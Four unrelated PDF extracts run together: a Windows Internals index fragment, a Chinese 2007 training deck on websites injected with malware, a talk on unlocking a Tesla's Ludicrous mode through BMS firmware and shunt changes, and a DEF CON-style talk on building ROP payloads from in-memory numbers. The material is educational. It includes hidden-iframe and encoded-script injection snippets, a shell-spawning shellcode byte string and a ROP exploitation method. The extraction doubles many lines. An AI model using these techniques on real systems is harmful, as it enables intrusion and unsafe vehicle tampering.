boot and last known good, 460–462
characteristics, 429–433
Clipboard User Service, 472
control programs, 450–451
delayed autostart, 457–458
failures, 462–463
groupings, 466
interactive services/session 0 isolation,
444–446
local service account, 436
local system account, 434–435
network service account, 435
packaged services, 473
process, 428
protected services, 474–475
Recovery options, 463
running services, 436
running with least privilege, 437–439
SCM (Service Control Manager), 426, 446–450
SCP (service control program), 426
Service and Driver Registry parameters,
429–432
service isolation, 439–443
Service SIDs, 440–441
shared processes, 465–468
shutdown, 464–465
startup errors, 459–460
Svchost service splitting, 467–468
tags, 468–469
triggered-start, 457–459
user services, 469–473
virtual service account, 443–444
window stations, 445
Windows threads, viewing user start address
for, 89–91. See also thread-local register
effect
WindowStation object, 129
Wininit, 831–835
Winload, 792–796, 808–810
Winlogon, 831–834, 838
WinObjEx64 tool, 125
WinRE (Windows Recovery Environment),
845–846. See also recovery
Index
881
XTA cache
WMI (Windows Management Instrumentation)
architecture, 487–488
CIM (Common Information Model),
488–495
class association, 493–494
Control Properties, 498
DMTF, 486, 489
implementation, 496–497
Managed Object Format Language,
489–495
MOF (Managed Object Format), 488–495
namespace, 493
ODBC (Open Database Connectivity), 488
overview, 486–487
providers, 488–489, 497
scripts to manage systems, 495
security, 498
System Control commands, 497
WmiGuid object, 130
WmiPrvSE creation, viewing, 496
WNF (Windows Notification Facility)
event aggregation, 237–238
features, 224–225
publishing and subscription model, 236–237
state names and storage, 233–237
users, 226–232
WNF state names, dumping, 237
wnfdump command, 237
WnfDump utility, 226, 237
WoW64 (Windows-on-Windows)
ARM, 113–114
ARM32 simulation on ARM 64 platforms, 115
core, 106–109
debugging in ARM64, 122–124
exception dispatching, 113
file system redirection, 109–110
memory models, 114
overview, 104–106
registry redirection, 110–111
system calls, 112
user-mode core, 108–109
X86 simulation on AMD64 platforms, 759–751
X86 simulation on ARM64 platforms, 115–125
write throttling, 596–597
write-back caching and lazy writing, 589–595
write-behind and read-ahead. See read-ahead
and write-behind
WSL (Windows Subsystem for Linux), 64, 128
X
x64 systems, 2–4
viewing GDT on, 4–5
viewing TSS and IST on, 8–9
x86 simulation in ARM64 platforms, 115–124
x86 systems, 3, 35, 94–95, 101–102
exceptions and interrupt numbers, 86
Retpoline code sequence, 23
viewing GDT on, 5
viewing TSSs on, 7–8
XML descriptor, Task Scheduler, 479–481
XPERF tool, 504
XTA cache, 118–120 | pdf |
Web
Web安全威脅偵測與防護
安全威脅偵測與防護
Roger Chiu
Roger Chiu
邱春樹
邱春樹
Malware
Malware--Test Lab
Test Lab
http://www.malware
http://www.malware--test.com
test.com
PDF created with pdfFactory Pro trial version www.pdffactory.com
訓練大綱
訓練大綱
u
u 相關新聞報導
相關新聞報導
u
u 網站被植入惡意程式之展示
網站被植入惡意程式之展示
u
u 2007
2007年
年OWASP
OWASP十大
十大Web
Web資安漏洞
資安漏洞
u
u 網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
u 網站被植入惡意程式之偵測
網站被植入惡意程式之偵測
u
u 網站被植入惡意程式之防護
網站被植入惡意程式之防護
u
u 總結
總結
PDF created with pdfFactory Pro trial version www.pdffactory.com
相關新聞報導
相關新聞報導
u
u 2007
2007年
年55月
月21
21日:
日:Google
Google研究報告指出
研究報告指出全
全
球十分之一網站潛藏惡意連結或程式碼
球十分之一網站潛藏惡意連結或程式碼。
。
這些網站含有「偷渡式下載
這些網站含有「偷渡式下載(Drive
(Drive--by
by
Downloads
Downloads」之惡意程式。
」之惡意程式。
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之展示
網站被植入惡意程式之展示
u
u Web
Web資安威脅實例展示
資安威脅實例展示(DEMO)
(DEMO)
PDF created with pdfFactory Pro trial version www.pdffactory.com
2007
2007年
年OWASP
OWASP十大
十大Web
Web資安漏洞
資安漏洞
u
u Cross
Cross--Site Scripting (XSS)
Site Scripting (XSS)
u
u Injection Flaw
Injection Flaw
u
u Malicious File Execution
Malicious File Execution
u
u Insecure Direct Object Reference
Insecure Direct Object Reference
u
u Cross
Cross--Site Request Forgery (CSRF)
Site Request Forgery (CSRF)
u
u Information Leakage and Improper Error
Information Leakage and Improper Error
Handling
Handling
u
u Broken Authentication and Session Management
Broken Authentication and Session Management
u
u Insecure Cryptographic Storage
Insecure Cryptographic Storage
u
u Insecure Communication
Insecure Communication
u
u Failure to Restrict URL Access
Failure to Restrict URL Access
PDF created with pdfFactory Pro trial version www.pdffactory.com
與程式碼安全品質有關的
與程式碼安全品質有關的OWASP
OWASP
Web
Web資安漏洞
資安漏洞
u
u Cross Site Scripting (XSS)
Cross Site Scripting (XSS) –– 跨站腳本
跨站腳本
攻擊
攻擊
u
u Injection Flaws
Injection Flaws –– 注入弱點
注入弱點
u
u Malicious File Execution
Malicious File Execution––惡意檔案執行
惡意檔案執行
u
u Insecure Direct Object Reference
Insecure Direct Object Reference ––不
不
安全的物件參考
安全的物件參考
u
u Cross Site Request Forgery (CSRF)
Cross Site Request Forgery (CSRF) ––
跨站冒名請求
跨站冒名請求
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
uiframe
iframe語法
語法
<
<iframe
iframe src
src=
=木馬網址
木馬網址 width=0 height=0></
width=0 height=0></iframe
iframe>
>
u
uExample
Example
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
uJava Script
Java Script語法
語法
document.write
document.write("<
("<iframe
iframe width='0' height='0'
width='0' height='0' src
src='
='
木馬網址
木馬網址'></
'></iframe
iframe>");
>");
u
uExample(
Example(內容編碼
內容編碼//加密
加密))
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
u VB Script
VB Script語法
語法
u
u Example
Example((內容編碼
內容編碼//加密
加密))
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
u Java Script
Java Script 變型加密語法
變型加密語法
<SCRIPT language="
<SCRIPT language="JScript.Encode
JScript.Encode"
"
src
src=http://example/
=http://example/malware.txt
malware.txt></
></
script>
script>
*
* malware.txt
malware.txt 可改成任何附檔名
可改成任何附檔名
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
u 影音檔
影音檔((如
如RM, SWF, WMV
RM, SWF, WMV等
等))語法
語法
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
u Malformed ASCII Bypassing
Malformed ASCII Bypassing技術
技術
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之手法
網站被植入惡意程式之手法
u
u Microsoft Security Bulletin MS07
Microsoft Security Bulletin MS07--017:
017:
Vulnerabilities in GDI Could Allow
Vulnerabilities in GDI Could Allow
Remote Code Execution (925902)
Remote Code Execution (925902)
u
u Microsoft Security Advisory (935423):
Microsoft Security Advisory (935423):
Vulnerability in Windows Animated
Vulnerability in Windows Animated
Cursor Handling
Cursor Handling
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之偵測
網站被植入惡意程式之偵測
u
u 在下圖中,偵測點是防毒
在下圖中,偵測點是防毒//資安軟體可以偵
資安軟體可以偵
測到這些威脅的時間點
測到這些威脅的時間點
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之偵測
網站被植入惡意程式之偵測
u
u 幾乎所有的資安軟硬軟體皆無法在第一時
幾乎所有的資安軟硬軟體皆無法在第一時
間有效地偵測
間有效地偵測
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之偵測
網站被植入惡意程式之偵測
u
u 使用防毒軟體
使用防毒軟體
u
u 使用防火牆
使用防火牆
u
u 使用入侵偵測系統
使用入侵偵測系統(IDS)
(IDS)
u
u 使用入侵預防系統
使用入侵預防系統(IPS)
(IPS)
u
u 使用
使用MD5
MD5比對使用中與原來檔案之完整性
比對使用中與原來檔案之完整性
u
u 行為偵測技術已成防毒軟體防護技術主流
行為偵測技術已成防毒軟體防護技術主流
((與
與Windows Vista
Windows Vista的
的UAC
UAC功能相似
功能相似))
•• http://rogerspeaking.blogspot.com/200
http://rogerspeaking.blogspot.com/200
7/09/blog
7/09/blog--post_3909.html
post_3909.html
PDF created with pdfFactory Pro trial version www.pdffactory.com
網站被植入惡意程式之防護
網站被植入惡意程式之防護
u
u 安裝修補程式
安裝修補程式((作業系統、應用程式
作業系統、應用程式...)
...)
u
u 使用防毒軟體
使用防毒軟體
u
u 使用行為偵測軟體
使用行為偵測軟體((較不適用於閘道端或伺
較不適用於閘道端或伺
服器端的防毒
服器端的防毒//資安軟體
資安軟體))
u
u 不隨意瀏覽網站
不隨意瀏覽網站
u
u 建立網站黑名單
建立網站黑名單((最準確的偵測方式
最準確的偵測方式))
PDF created with pdfFactory Pro trial version www.pdffactory.com
總結
總結
u
u 網路如虎口,處處充滿危機
網路如虎口,處處充滿危機
u
u 知名網站也可能帶來危害
知名網站也可能帶來危害((最近有很多相關
最近有很多相關
報導,如
報導,如PTT
PTT、
、Hinet
Hinet等等
等等))
u
u 使用者必須提高危機意識
使用者必須提高危機意識
u
u 使用者必須要有正確的資安觀念,否則,
使用者必須要有正確的資安觀念,否則,
就下一個受害者可能就是你
就下一個受害者可能就是你//妳
妳
u
u 企業培養資安專業人員之重要性
企業培養資安專業人員之重要性
u
u 一般使用者資安認知教育訓練之重要性
一般使用者資安認知教育訓練之重要性
PDF created with pdfFactory Pro trial version www.pdffactory.com
聯絡方式
聯絡方式
u
u Email
Email
•• roger@malware
[email protected]
test.com
u
u Malware
Malware--Test Lab
Test Lab
•• http://www.malware
http://www.malware--test.com
test.com
u
u 大砲開講部落格
大砲開講部落格
•• http://
http://rogerspeaking.com
rogerspeaking.com
PDF created with pdfFactory Pro trial version www.pdffactory.com | pdf |
Reverse Engineering the Tesla
Battery Management System to
Increase Power Available
Patrick Kiley
2
Patrick Kiley – Principal Security Consultant - Rapid7
• Member of the Penetration Testing team at
Rapid7
• Performed research in Avionics security
• Internet connected transportation platforms.
• Experience in hardware hacking, IoT,
Autonomous Vehicles, and CAN bus.
3
Topics
• Architecture of the Model S and Battery Management
System(BMS)
• Performance and Ludicrous timeline
• Hardware changes
• Data stored in toolbox
• Firmware changes
• Shunt modification
• Upgrade process
• Failure and what I learned
• Next steps
4
Model S Architecture
• Central Information Display (CID):
Nvidia Tegra based
• Gateway: a security component, stores
vehicle configuration, sits between the
various CAN buses and the CID
• Powertrain (PT) CAN bus, contains the
BMS, Drive units, charging, thermal
control and other powertrain related
controllers
• PT CAN runs at 500 kBit/sec and is a
standard vehicle CAN bus (differential
signaling, 11 bit arb ids, etc)
• PT CAN supports UDS standard.
5
BMS Overview
• TI TMS320C2809 – Main microprocessor
• Altera CPLD – Hardware backup for TMS320
• Current Shunt with STM8 , measures current coming from the battery
• Precharge Resistor, prevents inrush current damage
• BMB boards on each battery pack, these include bleed resistors to balance
packs
All the firmware changes are on the TMS320
Some settings are changed on the shunt, in addition it has a small physical
modification
Full reversing of all the components is an ongoing project, so if you want to
help, I am lacking in some of the skill areas.
BMS with Components
6
7
Ludicrous History
• P85D announced on Oct 10, 2014
• Ludicrous announced on July 17, 2015
• 10K for new buyers, 5K for existing P85D owners
• Upgrade involved new contactors and pyro fuse
• Many performance battery packs would come standard with new components
• They were “ludicrous capable”,
• All 100kWh performance battery packs are “ludicrous capable”
• Ludicrous capable means add “performanceaddon 1” to single file, internal.dat on the gateway
I Upgraded a Donor Vehicle
8
Pack Dropped
9
Fuse and Contactor Bay
10
Shunt and Contactor Close Up
11
12
What about Firmware?
• For this we need to dig into some python
• Tesla makes a diagnostic tool called toolbox, runs on
windows, uses encrypted and compiled python
modules.
• The important files are contained as individual plugins
with the .scramble extension.
• All of the information needed to decrypt the scramble
files are on a machine that is running toolbox.
• Some of these scramble files include firmware as well
as many other useful items.
• Once decrypted, we can use Uncompyle6 to give us
source code
• Tesla left all the source code comments in place.
Thank you!
Toolbox Uncompyled
13
Helpful Comments
14
Data Structures – Extract and Binwalk
15
16
Bootloader
• We already know from the
donor vehicle’s config that
it had a pack id of “57”
• These are the files we need
from the extracted
firmware
• Pack id 57 becomes pack id
70 after the changes
17
Firmware Upgrade
• All the instructions and files needed for the upgrade
process were stored in Toolbox files
• DBC files to help understand signals on the PT CAN
bus, stored in python pickle format
• ODX files that defined how to calibrate the shunt,
grant security access and upgrade the firmware
• Files that stored calibration data and firmware in
python pickle format
• Text comments and text data structures that
offered clues on the process
18
CAN and UDS
Sitting on top of the CAN network stack is a protocol called
UDS, or “Unified Diagnostic Services”, this protocol can be
used to help technicians:
• Diagnose problems
• Read values from sensors
• Update firmware
CAN networks use a descriptor file called a DBC file
UDS networks can use a scripting file called ODX or GMD
Used commercial tool Vehicle Spy to assist in the research
ARBS 7E2 and 202 from BMS identify max current as a static
value
232 (BMS), 266 (DI) and 2E5 (DIS), identify max power in
watts, which varies based on SOC, temp, and power
recently used
DBC Turns This
19
Into This
20
ODX Routines for Shunt Calibration
21
22
Shunt Modification
• Shunt also needed a hardware modification
• Single wire connecting the shunt to the CPLD.
• If this wire remained connected after the firmware update then
the BMS would generate an alert and refuse to close the
contactors.
• Discovered ran through the upgrade process on a bench version
of the components.
• Made a breakout board to monitor the signals from the shunt.
• This also meant that the hardware and firmware both had to be
updated before the car was driven
23
Upgrade Process
•
Had access to garage and lift in Southern California
•
Drove there to do upgrade, arrive with low SOC
•
Drop pack, do hardware stuff
•
Reinstall pack, carefully (image is from borescope)
•
Flash BMS with special firmware for shunt
modification
•
Flash BMS to new packID
•
Update internal.dat to add ludicrous and change
packID
•
Redeploy firmware due to changed battery packID
•
Drive away and enjoy the ridiculous amount of
torque?
24
Final Steps
•
Using known techniques that I have used before,
I tried to redeploy the firmware, also tried to
upgrade since I had access to several versions
•
The car failed using every method I tried.
•
Had to Tow the car from Rancho Cucamonga to
Las Vegas so I could continue to work on it.
•
Cost me $360 or 3.6 hundred dollars, not great,
not terrible right?
25
Learned Something Cool
•
Gateway uses a file called firmware.rc
•
Gateway uses this as a validation check for the
components
•
Calculated during upgrade/redeploy
•
When the BMS changed, so did its CRC
•
Changed the CRC based on CAN and value from
“signed_metadata_map.tsv”
•
Final CRC line is a JAMCRC based on overall file
•
Car woke up, errors cleared and car could be
driven.
•
Eventually figured out the reason for the earlier
failure.
26
Power Before and After Upgrade
•
Before Upgrade
•
1300 Amps
•
After Upgrade
•
1500 Amps
•
Actual Available
•
Why Lower?
27
Further Research
•
TMS320F2809 is supported in IDA Pro
•
ARBS 7E2 and 202 define max current
•
Seems possible to increase speed beyond ludicrous, it has been done by others (1000 HP RWD P85)
•
Just need to find the variables and “bump them up a bit”, also might need to modify DU firmware
•
Could be dangerous to do so, ludicrous drain is already 20A/cell or ~6.6C for you RC hobbyists
•
Could end up burning out the Drive unit IGBTs or battery pack, or worse, cause a fire.
•
Still it would be interesting to reverse engineer, hit me up if you would like to assist, I have a dug a lot
deeper than the information I am presenting here
•
Would like to understand shunt parameters CAU1, CGI1
•
Check out Car Hacking Village talk for deep dive into many of these techniques, some analysis of the
firmware and where we can take this project from here
28
Referenced Material, Acknowledgements
•
Spaceballs movie, inspiration for Tesla Ludicrous https://www.imdb.com/title/tt0094012/
•
P85D announcement https://www.tesla.com/blog/dual-motor-model-s-and-autopilot
•
Ludicrous announcement and P85D upgrade offer https://www.tesla.com/blog/three-dog-day
•
What is a current shunt? https://youtu.be/j4u8fl31sgQ (electroboom)
•
TMS320 datasheet https://www.ti.com/product/TMS320F2809
•
Intrepid Control Systems, makers of Vehicle Spy software https://intrepidcs.com/
•
Bitbuster, for allowing use of lift and garage
•
The people who helped with the Toolbox reversing, you know who you are
•
Tesla security team for letting me do this talk.
Thank You.
Email [email protected] or visit http://rapid7.com | pdf |
Stitching numbers
Alex Moneger
Security Engineer
10th of August 2014
Generating ROP payloads from in memory numbers
Cisco Con!dential
2
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Work for Cisco Systems
! Security engineer in the Cloud Web Security Business Unit (big cloud
based security proxy)
! Interested mostly in bits and bytes
! Disclaimer: research… own time… my opinions… not my employers
Who am I?
Cisco Con!dential
3
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
1. Brief ROP overview
2. Automating ROP payload generation
3. Number Stitching
1.
Goal
2.
Finding gadgets
3.
Coin change problem
4. Pros, Cons, Tooling
5. Future Work
Agenda
Cisco Con!dential
4
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Introduction
Cisco Con!dential
5
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Use only gadgets generated by libc or compiler stubs. In short,
target the libc or compiler gadgets instead of the binary ones
! Generate payloads using numbers found in memory
! Solve the coin change problem to automatically generate ROP
payloads
! Automate the payload generation
TL;DR
Cisco Con!dential
6
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
ROP overview
Cisco Con!dential
7
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Re-use instructions from the vulnerable binary
! Control #ow using the stack pointer
! Multi-staged:
1. Build the payload in memory using gadgets
2. Transfer execution to generated payload
! Only way around today’s OS protections (let aside home routers,
embedded systems, IoT, …)
Principle
Cisco Con!dential
8
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Useful instructions => gadgets
! Disassemble backwards from “ret” instruction
! Good tools available
! Number of gadgets to use is dependent upon target binary
Finding instructions
Cisco Con!dential
9
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Once payload is built in memory
! Transfer control by “pivoting” the stack
! Allows to redirect execution to a stack crafted by the attacker
! Useful gadgets:
! leave; ret
! mv esp, addr; ret
! add esp, value; ret
Transfer control to payload
Cisco Con!dential
10
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Automating payload generation
Cisco Con!dential
11
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Find required bytes in memory
! Copy them to a controlled stack
! Use either:
! A mov gadget (1, 2 or 4 bytes)
! A copy function if available (strcpy, memcpy, …) (variable byte length)
Classic approach
Cisco Con!dential
12
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Availability of a mov gadget
! Can require some GOT dereferencing
! Availability of some bytes in memory
! May require some manual work to get the missing bytes
Potential problems
Cisco Con!dential
13
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Shellcode requires “sh” (\x73\x68)
! Got it! What about “h/” (\x68\x2f)?
Finding bytes
someone@something:~/somewhere$#sc="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80”#
someone@something:~/somewhere$#ROPgadget#abinary#Bopcode#"\x73\x68"#
Gadgets#information#
============================================================#
0x08048321:#"\x73\x68”#
someone@something:~/somewhere$#hexdump#BC#abinary.text|#egrep#BBcolor#"73(\s)*68"#
00000320##75#73168#00#65#78#69#74##00#73#74#72#6e#63#6d#70##|ush.exit.strncmp|#
someone@something:~/somewhere$#hexdump#BC#hbinary5Bmem.txt#|#egrep#BBcolor#"68(\s)*2f"#
someone@something:~/somewhere$##
Cisco Con!dential
14
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Very small binaries do not tend to have many mov gadgets
! In the case of pop reg1; mov [ reg2 ], reg1:
! Null byte can require manual work
mov gadget
Cisco Con!dential
15
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Number stitching
Cisco Con!dential
16
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Is exploiting a “hello world” type vulnerability possible with:
! RELRO
! X^W
! ASLR
! Can the ROP payload be built only from libc/compiler introduced
stubs?
! In other words, is it possible not to use any gadgets from the target
binary code to build a payload?
Initial problem
Cisco Con!dential
17
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Program anatomy
Cisco Con!dential
18
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! What other code surrounds the “hello world” code?
! Does libc add anything at link time?
Libc static functions
someone@something:~/somewhere$#pygmentize#abinary.c#
#include#<stdio.h>#
#
int#main(int#argc,#char#**argv,#char**#envp)#{#
#printf("Hello#Defcon!!\n");#
}#
someone@something:~/somewhere$#objdump#Bd#Bj#.text#BM#intel#abinary|#egrep#'<(.*)>:'#
08048510#<_start>:#
080489bd#<main>:#
080489f0#<__libc_csu_fini>:#
08048a00#<__libc_csu_init>:#
08048a5a#<__i686.get_pc_thunk.bx>:#
Cisco Con!dential
19
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! At link time “libc.so” is used
! That’s a script which both dynamically and statically links libc:
! Looks libc_nonshared.a statically links some functions:
Where does this come from?
someone@something:~/somewhere$#cat#libc.so#
/*#GNU#ld#script#
###Use#the#shared#library,#but#some#functions#are#only#in#
###the#static#library,#so#try#that#secondarily.##*/#
OUTPUT_FORMAT(elf32Bi386)#
GROUP#(#/lib/i386BlinuxBgnu/libc.so.6#/usr/lib/i386BlinuxBgnu/libc_nonshared.a##AS_NEEDED#(#/lib/i386B
linuxBgnu/ldBlinux.so.2#)#)#
Cisco Con!dential
20
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Quite a few functions are:
What is statically linked?
someone@something:~/somewhere$#objdump#Bd#Bj#.text#BM#intel##/usr/lib/i386BlinuxBgnu/libc_nonshared.a#|#egrep#
'<*>:'#
00000000#<__libc_csu_fini>:#
00000010#<__libc_csu_init>:#
00000000#<atexit>:#
00000000#<at_quick_exit>:#
00000000#<__stat>:#
00000000#<__fstat>:#
00000000#<__lstat>:#
00000000#<stat64>:#
00000000#<fstat64>:#
00000000#<lstat64>:#
00000000#<fstatat>:#
00000000#<fstatat64>:#
00000000#<__mknod>:#
00000000#<mknodat>:#
00000000#<__warn_memset_zero_len>:#
00000000#<__stack_chk_fail_local>:#
Cisco Con!dential
21
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Those functions are not always included
! Depend on compile options (-fstack-protector, …)
! I looked for gadgets in them.
! Fail…
Gadgets in static functions
Cisco Con!dential
22
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Anything else added?
! Is there anything else added which is constant:
! get_pc_thunk.bx() used for PIE, allows access to GOT
! _start() is the “real” entry point of the program
! There are also a few “anonymous” functions (no symbols)
introduced by gcc.
! Those functions relate to pro!ling
Cisco Con!dential
23
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Pro!ling is surprisingly on by default on some distros. To check
default compiling options: cc –Q –v.
! Look for anything statically linking
! This work was done on gcc 4.4.5
! Looking for gadgets in that, yields some results!
Static linking
Cisco Con!dential
24
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! What I get to work with:
1. Control of ebx in an pro!ling function: pop#ebx#;#pop#ebp#;;#
2. Stack pivoting in pro!ling function: leave#;;
3. Write to mem in pro!ling function: add#[ebx+0x5d5b04c4]#eax#;;#
4. Write to reg in pro!ling function: add#eax#[ebxB0xb8a0008]#;#add#esp#
0x4#;#pop#ebx#;#pop#ebp#;;
! In short, attacker controls:
! ebx
! That’s it…
! Can anything be done to control the value in eax?
Useful gadgets against gcc 4.4.5
Cisco Con!dential
25
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Shellcode to numbers
Cisco Con!dential
26
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Useful gadget: add#eax#[ebxB0xb8a0008]#;#(removed trailing junk)
! We control ebx, so we can add arbitrary memory with eax
! Is it useful?
! Yes, let’s come back to this later
Accumulating
Cisco Con!dential
27
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Useful gadget: add#[ebx+0x5d5b04c4]#eax#;;#
! Ebx is under attacker control
! For the time being, assume we control eax
! Gadget allows to add a value from a register to memory
! If attacker controls eax in someway, this allows to write anywhere
! Use this in order to dump a value to a custom stack
Dumping
Cisco Con!dential
28
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Choose a spot in memory to build a stack:
! .data section is nice
! must be a code cave (mem spot with null bytes), since we are performing
add operations
! Choose a shellcode to write to the stack:
! As an example, use a setreuid shellcode
! Nothing unusual in all this
Approach
Cisco Con!dential
29
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
1. Next, cut the shellcode into 4 byte chunks
2. Interpret each chunk as an integer
3. Keep track of the index of each chunk position
4. Order them from smallest to biggest
5. Compute the di$erence between chunks
6. There is now a set of monotonically increasing values representing
the shellcode
Chopping shellcode
Cisco Con!dential
30
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Visual chopping
\x04\x03\x02\x01
\x08\x07\x06\x05
\x0d\x0c\x0b\x0a
0x01020304
0x05060708
0x0a0b0c0d
1
3
2
1
2
3
0x01020304
0x04040404
0x05050505
3
2
1
0x05060708 –
0x01020304
2
0x0a0b0c0d –
0x05060708
1
Shellcode
Chunks
Deltas
Monotonically
increasing
Cisco Con!dential
31
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Shellcode is represented as increasing deltas
! Add delta n with n+1
! Dump that delta at stack index
! Repeat
! We’ve copied our shellcode to our stack
Reverse process
Cisco Con!dential
32
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
1.
Find address of number 0x01020304 in memory
2.
Load that address into ebx
3.
Add mem to reg. Eax contains 0x01020304
4.
Add reg to mem at index 3. Fake stack contains “\x04\x03\x02\x01”
5.
Find address of number 0x04040404 in memory and load into ebx
6.
Add mem to reg. Eax contains 0x01020304 + 0x04040404 = 0x05060708
7.
Add reg to mem. Fake stack contains “\x08\x07\x06\x05\x04\x03\x02\x01”
8.
Repeat
Example
Cisco Con!dential
33
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! How easy is it to !nd the shellcode “numbers” in memory?
! Does memory contain numbers such as:
! 0x01020304
! "\x6a\x31\x58\x99” => 0x66a7ce96 (string to 2’s complement integer)
! If not, how can we build those numbers to get our shellcode?
Problem
Cisco Con!dential
34
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Stitching numbers
Cisco Con!dential
35
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! It’s not easy to !nd “big” numbers in memory
! Shellcode chunks are big numbers
! Example: looking for 0x01020304:
! In short, not many large numbers in memory
Answers
someone@something:~/somewhere$#gdb#hw#
gdbBpeda$#peda#searchmem#0x01020304#.text#
Searching#for#'0x01020304'#in:#.text#ranges#
Not#found#
Cisco Con!dential
36
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Scan memory regions in ELF:
! RO segment (contains .text, .rodata, …) is a good candidate:
! Read only so should not change at runtime
! If not PIE, addresses are constant
! Keep track of all numbers found and their addresses
! Find the best combination of numbers which add up to a chunk
Approach
Cisco Con!dential
37
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! This is called the coin change problem
! If I buy an item at 4.25€ and pay with a 5€ note
! What’s the most e"cient way to return change?
! 0.75€ change:
! 1 50 cent coin
! 1 20 cent coin
! 1 5 cent coin
Coin change problem
Cisco Con!dential
38
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! In dollars, answer is di$erent
! 0.75$:
! 1 half-dollar coin
! 1 quarter
! Best solution depends on the coin set
! Our set of coins are the numbers found in memory
In hex you’re a millionaire
Cisco Con!dential
39
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Ideal solution to the problem is using Dynamic Programming:
! Finds most e"cient solution
! Blows memory for big numbers
! I can’t scale it for big numbers yet
! Sub-optimal solution is the greedy approach:
! No memory footprint
! Can miss the solution
! Look for the biggest coin which !ts, then go down
! Luckily small numbers are easy to !nd in memory, meaning greedy will
always succeed
Solving the problem
Cisco Con!dential
40
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! 75 cents change example:
! Try 2 euros
✖
! Try 1 euro
✖
! Try 50 cents
✔#
! Try 20 cents
✔#
! Try 10 cents
✖
! Try 5 cents
✔
! Found solution:
Greedy approach
Cisco Con!dential
41
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Tool to !nd a solution to the coin change problem
! Give it a number, will get you the address of numbers which solve
the coin change problem
! Can also:
! Ignore addresses with null-bytes
! Exclude numbers from the coin change solver
! Print all addresses pointing to a number
! …
Introducing Ropnum
Cisco Con!dential
42
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Find me:
! The address of numbers…
! In the segment containing the .text section
! Which added together solve the coin change problem (i.e.: 0x01020304)
Usage
someone@something:~/somewhere$#ropnum.py#Bn#0x01020304#BS#Bs#.text#hw#2>#/dev/null##
Using#segments#instead#of#sections#to#perform#number#lookups.#
Using#sections#[.text]#for#segment#lookup.#
Found#loadable#segment#starting#at#[address#0x08048000,#offset#0x00000000]#
Found#a#solution#using#5#operations:#[16860748,#47811,#392,#104,#5]#
0x08048002#=>#0x0101464c#16860748#
0x0804804c#=>#0x00000005########5#
0x080482f6#=>#0x00000068######104#
0x08048399#=>#0x0000bac3####47811#
0x08048500#=>#0x00000188######392#
Cisco Con!dential
43
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
! Now you can use an accumulating gadget on the found addresses
! add#eax#[ebxB0xb8a0008]#;#add#esp#0x4#;#pop#ebx#;#pop#
ebp#;;#
! By controlling the value addressed by ebx, you control eax
Ropnum continued
someone@something:~/somewhere$#ropnum.py#Bn#0x01020304#BS#Bs#.text#hw#2>#/dev/null#
Found#a#solution#using#5#operations:#[16860748,#47811,#392,#104,#5]#
0x08048002#=>#0x0101464c#16860748#
0x0804804c#=>#0x00000005########5#
0x080482f6#=>#0x00000068######104#
0x08048399#=>#0x0000bac3####47811#
0x08048500#=>#0x00000188######392#
someone@something:~/somewhere$#python#Bc#'print#hex(0x00000188+0x0000bac3+0x00000068+0x00000005+0x0101464c)'###########
0x1020304#
Cisco Con!dential
44
© 2013-2014 Cisco and/or its a"liates. All rights reserved.
Putting it together
Cisco Con!dential
45
